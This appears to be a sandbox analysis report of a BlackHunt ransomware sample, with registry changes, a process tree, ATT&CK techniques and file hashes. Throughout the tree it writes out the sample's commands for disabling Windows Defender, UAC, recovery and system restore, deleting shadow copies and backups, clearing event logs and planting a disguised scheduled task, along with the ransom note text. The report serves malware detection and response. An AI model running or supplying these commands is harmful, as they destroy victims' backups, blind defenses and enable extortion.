description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe"C:\Users\Admin\AppData\Local\Temp\67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:3056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe" /F2⤵PID:2804
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe" /F3⤵
- Creates scheduled task(s)
PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2924
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1764
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2944
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2980
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2912
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2340
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1628
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:932
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2388
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2408
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2560
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:972
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2816
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3388
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2756
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3528
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:204
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2408
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2088
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3452
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2692
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2172
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2588
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2284
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2668
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3612
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1516
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\67b1a8a2156cec10c40b02c443af24f8bf9211a547348508eb97c22b735c19bf.exe"2⤵
- Deletes itself
PID:1608 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2980
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2002593085793851218186512621678374982-544455729745143644-19917183831928460587"1⤵
- Suspicious use of WriteProcessMemory
PID:3056
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1124
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3296
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a3f8ab26a6ca03677d9e43b344891895
SHA1ba74b8fd52e216f51f9dcc605e5b7b275a2b795c
SHA2565f30936a5f55f48ab7ad40d8e674aa3c89fa2ac77ce5eb0bd5b1611e30dd2f78
SHA512863c460defbc5ff2e43df3f3a5a86e3f4e8f994989e27e48414810b11136b6e7aba62d960ae41440e3b258546df5a4cc9e78efb0906135a5d0d4b21f21a0642c
-
Filesize
12KB
MD5366bb242256156a7af01a18d5d70b42c
SHA1cbd42b7ea3169d8e5d1e767311659d42ee755a8a
SHA25607dda645877a09e0a82f88ae5d0ae8d57312efb5882a9bd720e1e381a1ea298c
SHA512807da047c484bc0ca9ce367b09e7d48cbe1aa978e4e0274ee586a7706cc34549ac501c49003647092e2cb91927cdb9d23d3a23935d4f84865b7b10a84f0fe287
-
Filesize
684B
MD5ddea0e985cebbb7318f7bc6e09850262
SHA167ed4fbe7c1926a917e76e5ae7bad202a2b2f271
SHA2569b0f0eec2bc8679e1ebca1ed2f6e81dce798d5505402273d00e5efa660b7110c
SHA512ca005941923a7dc7930514a845ad6931e29c8f9633c119db9bc67842fdc71714f5a16a0b053afcd62c1e7f62268c9db4798eef52c29eaf594d0a8e9a16ac68e2